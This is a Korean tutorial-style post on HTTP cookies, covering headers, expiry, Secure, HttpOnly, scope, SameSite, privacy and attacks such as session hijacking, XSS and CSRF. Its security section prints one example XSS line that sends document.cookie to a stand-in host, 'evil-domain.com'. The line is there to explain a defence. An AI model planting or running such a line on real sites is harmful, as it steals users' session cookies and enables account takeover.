HTTP 쿠키

HTTP 쿠키란?

HTTP쿠키는 서버가 사용자의 웹 브라우저에 전송하는 작은 데이터 파일이다. 헨젤과 그레텔에서 주인공이 길을 지나며 남긴 빵 부스러기와 같다고 해서 붙여진 이름이다. 클라이언트는 그 데이터 파일을 저장해 놓았다가, 동일한 서버에 재 요청할 때 전송한다. 쿠키는 요청을 보낸 브라우저를 식별하는 데 주로 사용하며, 상태가 없는(stateless) HTTP 프로토콜에서 상태 정보를 기억시켜준다.

쿠키의 목적

• 세션 관리(Session management)
  • 서버에 저장해야 할 로그인, 장바구니, 게임 스코어 등의 정보 관리
• 개인화(Personalization)
  • 사용자 선호, 테마 등의 세팅
• 트래킹(Tracking)
  • 사용자 행동을 기록하고 분석하는 용도

클라이언트 측의 데이터 저장

데이터를 클라이언트 측에 저장할 때 쿠키를 사용하던 과거와 달리 지금은 modern storage APIs를 사용할 것이 권장된다. 쿠키는 모든 요청마다 함께 전송되기 때문에 성능이 저하될 수 있기 때문이다.

저장된 쿠키 보기

• 개발자 도구 > Storage Inspector -> 스토리지 트리의 쿠키 스토리지

쿠키 만들기

Set-Cookie 응답헤더와 Cookie 요청헤더

• Set-Cookie: 서버: 클라이언트야 쿠키 저장해!

1
2

Set-Cookie: 쿠키이름=쿠키값
Set-Cookie: 쿠키이름=쿠키값

• Cookie: 브라우저: 서버로 이전에 저장했던 모든 쿠키들 회신

1

Cookie: 쿠키이름1=쿠키값1; 쿠키이름2=쿠키값2

Session 쿠키와 Permanent 쿠키

Expires나 Max-Age를 명시하지 않을 경우 클라이언트가 종료되면 삭제되는 Session 쿠키가 된다. 명시하면 클라이언트가 닫힐 때 만료되지 않는 Permanent 쿠키가 된다.

1

Set-Cookie: id=a3fWa; Expires=Wed, 21 Oct 2015 07:28:00 GMT; // Permanent 쿠키

Secure 쿠키와 HttpOnly 쿠키

쿠키에 Secure 옵션을 줄 경우 Https 프로토콜 상에서 암호화된 요청일 경우만 전송된다. HttpOnly 옵션을 줄 경우, 자바스크립트를 통해 쿠키 값에 접근하는 것을 막아 Cross-site 스크립팅 공격을 누그러뜨리는 데 도움을 줄 수 있다.

쿠키의 스코프: Domain과 Path 속성

• Domain과 Path 디렉티브를 통해 특정 도메인 혹은 경로 제한 설정이 가능하다.
• Domain: 서브도메인 포함
  • 예를 들어, Domain=naver.com가 설정되면 쿠키들이 dict.naver.com, news.naver.com과 같은 서브 도메인 상에도 포함된다.
• Path: 서브 디렉토리 포함
  • 예를 들어, Path=/docs가 설정되면 쿠키들이 /docs, docs/Web/, docs/HTTP와 같은 서브 디렉토리 상에도 포함된다.

SameSite 쿠키

SameSite 쿠키는 쿠키가 cross-site 요청과 함께 전송되지 않게 한다.

Document.cookie를 사용한 자바스크립트 접근

• Document.cookie를 사용해 쿠키를 만들어낼 수 있다. HttpOnly플래그가 설저어되지 않은 경우 기본 쿠키들은 자바스크립트로부터 잘 접근될 수 있다

1
2
3
4

document.cookie = "yummy_cookie=choco";
document.cookie = "tasty_cookie=strawberry";
console.log(document.cookie);
// logs "yummy+cookie=choco; tasty_cookie=strawberry";

보안

세션 하이재킹과 XSS(Cross-Site Script)

세션 하이재킹이란 서버와 클라이언트 사이에서 이루어지는 통신에 낑겨서 클라이언트가 서버로 붙어 있는 세션을 탈취해오는 기술이다. XSS(Cross-Site Script, 사이트 간 스크립팅)는 권한이 없는 유저가 사이트 내에 악의적인 스크립트를 삽입하여 사용자의 쿠키, 세션 등을 탈취하거나, 의도하지 않은 비정상적인 행위를 하게끔 유도할 수 있는 취약점이다.

HTTP 통신은 Stateless하기 때문에 기본적으로는 로그인을 해도 페이지 이동 시 로그아웃이 될 것이다. 따라서 서버는 세션을 이용하여 로그인 상태를 기억한다. 서버는 Session ID를 사용자에게 부여해주고 사용자는 쿠키를 이용해 Session ID를 저장한다. 공격자는 사용자와 서버 사이에 부여된 세션을 가로채 해당 사용자의 권한으로 사이트를 접근할 수 있게 된다. 소셜 공학을 사용하거나 애플리케이션 내의 XSS 취약점을 이용하여 쿠키를 가로챌 수 있다.

1

(new Image()).src = "https://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

그렇다면 이를 방지하기 위해서는 어떻게 해야 할까? 쿠키에 HttpOnly 속성을 주면 자바스크립트를 통해 쿠키 값에 접근하는 것을 막아 공격을 누그러뜨리는 데 도움을 줄 수 있다.

Cross-site 요청 위조 (CSRF)

불특정 다수를 대상으로 로그인된 사용자가 자신의 의지와는 무관하게 공격자가 의도한 행위(수정, 삭제, 등록 등)을 요청하게 하는 공격이다. XXS을 이용한 공격이 사용자가 특정 웹사이트를 신용하는 점을 노린 것이라면, 사이트간 요청 위조는 특정 웹사이트가 사용자의 웹브라우저를 신용하는 상태를 노린 것이다. 사용자가 웹사이트에 로그인한 상태에서 사이트간 요청 위조 공격 코드가 삽입된 페이지를 열면, 공격 대상이 되는 웹사이트는 위조된 공격 명령이 믿을 수 있는 사용자로부터 발송된 것으로 판단하게 되어 공격에 노출된다.

트래킹과 프라이버시

서드파티 쿠키

퍼스트파티 쿠키는 웹사이트 운영자가, 서드파티는 외부 업체가 심는 것이다. 브라우저가 서드파티 쿠키를 지원하면 쿠키를 인터넷 광고 업체 등 제3자에게 제공하는 것으로 기업 광고의 주요 자원이 된다. 광고주는 해당 쿠키로 이용자 성향을 파악해 타겟팅 광고를 할 수 있다. 그러나 이로 인한 개인 정보 침해 문제로 최근 많은 브라우저에서 서드파티 쿠키 지원을 중단하겠다고 발표했다.

DNT 요청 헤더 (Do Not Track)

사이트 내부 혹은 사이트간 트래킹 모두를 비활성화하는 신호로 사용된다.

좀비 쿠키와 에버쿠키

좀비 쿠키는 삭제 이후에 다시 생성되는 쿠키이다. 클라이언트 측 스크립트가 여러 곳(웹 스토리지 API, Flash로컬 공유 객체 등)에 쿠키 내용을 저장하고, 스크립트가 쿠키가 없음을 알아차리면 각 위치에 저장되어 있는 데이터를 사용하여 쿠키를 재생성한다. Evercookie는 좀비 쿠키를 생산하는 자바스크립트 기반 어플리케이션이다.

Reference

1. https://developer.mozilla.org/ko/docs/Web/HTTP/Cookies

2. 생활코딩: Node.js - 쿠키와 인증 시리즈: https://youtu.be/i51xW3eh-T4

3. https://ko.wikipedia.org/wiki/%EC%82%AC%EC%9D%B4%ED%8A%B8%EA%B0%84%EC%9A%94%EC%B2%AD_%EC%9C%84%EC%A1%B0

4. http://it.chosun.com/site/data/html_dir/2020/02/16/2020021600579.html

5. https://gmyankee.tistory.com/86

6. http://wiki-camp.appspot.com/%5B%EB%B2%88%EC%97%AD%5D_HTTP_Cookie_%28Wikipedia%29?rev=2

7. https://ko.wikipedia.org/wiki/%EC%B6%94%EC%A0%81_%EA%B8%88%EC%A7%80